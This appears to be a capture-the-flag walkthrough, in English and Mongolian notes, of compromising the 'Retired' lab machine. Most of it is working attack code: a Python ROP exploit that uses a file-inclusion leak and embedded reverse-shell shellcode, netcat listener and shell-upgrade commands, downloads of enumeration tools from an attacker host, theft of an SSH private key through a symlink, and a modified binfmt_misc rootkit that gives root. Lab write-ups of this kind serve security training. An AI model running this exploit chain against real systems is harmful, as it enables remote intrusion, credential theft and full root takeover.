Reading symbols from /lib/x86_64-linux-gnu/libpthread.so.0...
Reading symbols from /usr/lib/debug/.build-id/50/18237bbf012b4094027fd0b96fc22a24496ea4.debug...
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Reading symbols from /lib/x86_64-linux-gnu/libdl.so.2...
Reading symbols from /usr/lib/debug/.build-id/11/8b90161526d181807818c459baee841993795b.debug...
Reading symbols from /lib64/ld-linux-x86-64.so.2...
Reading symbols from /usr/lib/debug/.build-id/32/438eb3b034da54caf58c7a65446639f7cfe274.debug...
--Type <RET> for more, q to quit, c to continue without paging--c
0x00007f17a957de8e in __GI___libc_read (fd=4, buf=0x7ffc84813adc, nbytes=4) at ../sysdeps/unix/sysv/linux/read.c:26
26 ../sysdeps/unix/sysv/linux/read.c: No such file or directory.
(gdb)
Script.py nc -vlnp 9001 local ip -тай ажилууллвал netcat
nc -vlnp 9001
python script
python3 script.py 10.10.14.58 9001
#!/usr/bin/env python
from pwn import *
import sys,re,requests,socket
IP="10.10.11.154"
def usage():
print(f"Usage: {sys.argv[0]} <LOCAL IP> <LOCAL PORT>")
exit()
# download file and save to /tmp
def get_file(path):
r = requests.get(f"http://{IP}/index.php?page={path}", allow_redirects=False)
lpath = f"/tmp/{path.split('/')[-1]}"
with open(lpath,"wb") as f:
f.write(r.content)
return lpath
# find process id
def get_pid():
r = requests.get(f"http://{IP}/index.php?page=/proc/sched_debug", allow_redirects=False)
pid = re.search("activate_licens\s+([0-9]+)",r.text).group(1)
print(f"[+] activate_license running @ PID {pid}")
return pid
# extract base addresses from /proc/PID/maps
def get_addresses(pid):
r = requests.get(f"http://{IP}/index.php?page=/proc/{pid}/maps", allow_redirects=False)
libc_base = int(re.search("^.*libc.*$", r.text, re.M).group(0).split("-")[0], 16)
libc_path = re.search("^.*libc.*$", r.text, re.M).group(0).split(" ")[-1]
libsqlite_base = int(re.search("^.*libsqlite.*$", r.text, re.M).group(0).split("-")[0], 16)
libsqlite_path = re.search("^.*libsqlite.*$", r.text, re.M).group(0).split(" ")[-1]
stack_base = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[0], 16)
stack_end = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[1].split()[0], 16)
return libc_base, libc_path,libsqlite_base, libsqlite_path, stack_base, stack_end
def main():
if len(sys.argv) < 3:
usage()
try:
ip = socket.inet_aton(sys.argv[1])
port = port=struct.pack(">H",int(sys.argv[2]))
except:
print(f"[-] Invalid arguments")
usage()
# Shellcode msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=port -f py
shellcode = b""
shellcode += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48"
shellcode += b"\x97\x48\xb9\x02\x00" + port + ip + b"\x51\x48"
shellcode += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e"
shellcode += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58"
shellcode += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48"
shellcode += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
# search PID with LFI
pid = get_pid()
if not pid:
print(f"[-] Could not find PID for activate_license")
exit()
# search addresses in /proc/PID/maps
libc_base, libc_path, libsqlite_base, libsqlite_path, stack_base, stack_end = get_addresses(pid)
# calc sizeof(stack) for mprotect
stack_size = stack_end - stack_base # 0x21000
context.clear(arch='amd64')
libc = ELF(get_file(libc_path),checksec=False) # download libc
libc.address = libc_base
libsql = ELF(get_file(libsqlite_path),checksec=False) # download libsqlite
libsql.address = libsqlite_base
rop = ROP([libc, libsql])
offset = 520
# search ROP Gadgets
mprotect = libc.symbols['mprotect'] # 0xf8c20 readelf -s libc.so.6 | grep mprotect
pop_rdi = rop.rdi[0] # 0x26796 ropper -f libc.so.6 --search "pop rdi"
pop_rsi = rop.rsi[0] # 0x2890f ropper -f libc.so.6 --search "pop rsi"
pop_rdx = rop.rdx[0] # 0xcb1cd ropper -f libc.so.6 --search "pop rdx"
jmp_rsp = rop.jmp_rsp[0] # 0xd431d ropper -f libsqlite3.so.0.8.6 --search "jmp rsp"
payload = b'A' * offset
#int mprotect(void *addr, size_t len, int prot);
payload += p64(pop_rdi) + p64(stack_base) # addr = Begin of Stack
payload += p64(pop_rsi) + p64(stack_size) # len = size of Stack
payload += p64(pop_rdx) + p64(7) # prot = Permission 7 -> rwx
payload += p64(mprotect) # call mprotect
payload += p64(jmp_rsp) # jmp rsp
payload += shellcode # add shellcode
# File Upload beta.html
r = requests.post(f"http://{IP}/activate_license.php", files = { "licensefile": payload } )
if __name__ == "__main__":
main()
shell balance:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
wget http://10.10.14.58:8000/linpeas.sh
chmod +x linpeas.sh
var/www/html дотор symlink үүсгээд
ln -s /home/dev/.ssh/id_rsa /var/www/html
үүссэн сүүлийн backup файл-г tmp дотор unzip хийгээд харвал id_rsa байгаа.
# Machine VM
python3 -m http.server 900
# Local VM
wget 10.10.11.154:9001/id_rsa
chmod 600 id_rsa
sh -i id_rsa dev@10.10.11.154
user.txt
3ff5b1*******
7. Privilege escalation
cd /proc/sys/fs/binfmt_misc
dev@retired:/proc/sys/fs/binfmt_misc$ ls -lha
total 0
drwxr-xr-x 2 root root 0 Jul 10 21:40 .
dr-xr-xr-x 1 root root 0 Jul 10 21:40 ..
-rw-r--r-- 1 root root 0 Jul 10 21:40 EMUEMU
--w------- 1 root root 0 Jul 10 21:40 register
-rw-r--r-- 1 root root 0 Jul 10 21:40 status
EMUEMU
enabled
interpreter /usr/bin/emuemu
flags:
offset 0
magic 13374f53545249434800524f4d00
Status
dev@retired:/proc/sys/fs/binfmt_misc$ cat status
enabled
binfmt_misc Бэлэн toolkit ашиглах:
git clone https://github.com/plcp/binfmt_misc
cd binfmt_misc
./binfmt_rootkit --help
Usage: ./binfmt_rootkit
Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
note that it must be enforced by any other mean before your try this, for
example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave
is thinking that you are fixing his problem.
not_writeable - коммент хийнэ, register руу хандаж болохгүй болохоор.
binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
echo "$binfmt_line" > /tmp/temp.txt
cat /tmp/temp.txt | /usr/lib/emuemu/reg_helper
exec "$target"
source
#!/bin/bash
readonly searchsuid="/bin/"
readonly mountpoint="/proc/sys/fs/binfmt_misc"
readonly exe="$0"
warn()
{
1>&2 echo $@
}
die()
{
warn $@
exit -1
}
usage()
{
cat 1>&2 <<EOF
Usage: $exe
Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
note that it must be enforced by any other mean before your try this, for
example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave is
thinking that you are fixing his problem.
EOF
exit 1
}
# function not_writeable()
# {
# test ! -w "$mountpoint/register"
# }
function pick_suid()
{
find "$1" -perm -4000 -executable \
| tail -n 1
}
function read_magic()
{
[[ -e "$1" ]] && \
[[ "$2" =~ [[:digit:]]+ ]] && \
dd if="$1" bs=1 count="$2" status=none \
| sed -e 's-\x00-\\x00-g'
}
[[ -n "$1" ]] && usage
not_writeable && die "Error: $mountpoint/register is not writeable"
target="$(pick_suid "$searchsuid")"
test -e "$target" || die "Error: Unable to find a suid binary in $searchsuid"
binfmt_magic="$(read_magic "$target" "126")"
test -z "$binfmt_magic" && die "Error: Unable to retrieve a magic for $target"
fmtname="$(mktemp -u XXXX)"
fmtinterpr="$(mktemp)"
gcc -o "$fmtinterpr" -xc - <<- __EOF__
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <pwd.h>
int main(int argc, char *argv[])
{
// remove our temporary file
unlink("$fmtinterpr");
// remove the unused binary format
FILE* fmt = fopen("$mountpoint/$fmtname", "w");
fprintf(fmt, "-1\\n");
fclose(fmt);
// MOTD
setuid(0);
uid_t uid = getuid();
uid_t euid = geteuid();
struct passwd *pw = getpwuid(uid);
struct passwd *epw = getpwuid(euid);
fprintf(stderr, "uid=%u(%s) euid=%u(%s)\\n",
uid,
pw->pw_name,
euid,
epw->pw_name);
// welcome home
char* sh[] = {"/bin/sh", (char*) 0};
execvp(sh[0], sh);
return 1;
}
__EOF__
chmod a+x "$fmtinterpr"
# binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
# echo "$binfmt_line" > "$mountpoint"/register
# exec "$target"
# Changes
binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
echo "$binfmt_line" > /tmp/temp.txt
cat /tmp/temp.txt | /usr/lib/emuemu/reg_helper
exec "$target"
Хуулах
# Local Machine
python3 -m http.server
# VM Machine
wget http://10.10.14.58:8000/binfmt_rootkit
chmod +x binfmt_rootkit
./binfmt_rootkit run хийвэл
dev@retired:~$ chmod +x binfmt_rootkit │
dev@retired:~$ ./binfmt_rootkit │
./binfmt_rootkit: line 52: not_writeable: command not found │
uid=0(root) euid=0(root)
root.txt
d34f6a*******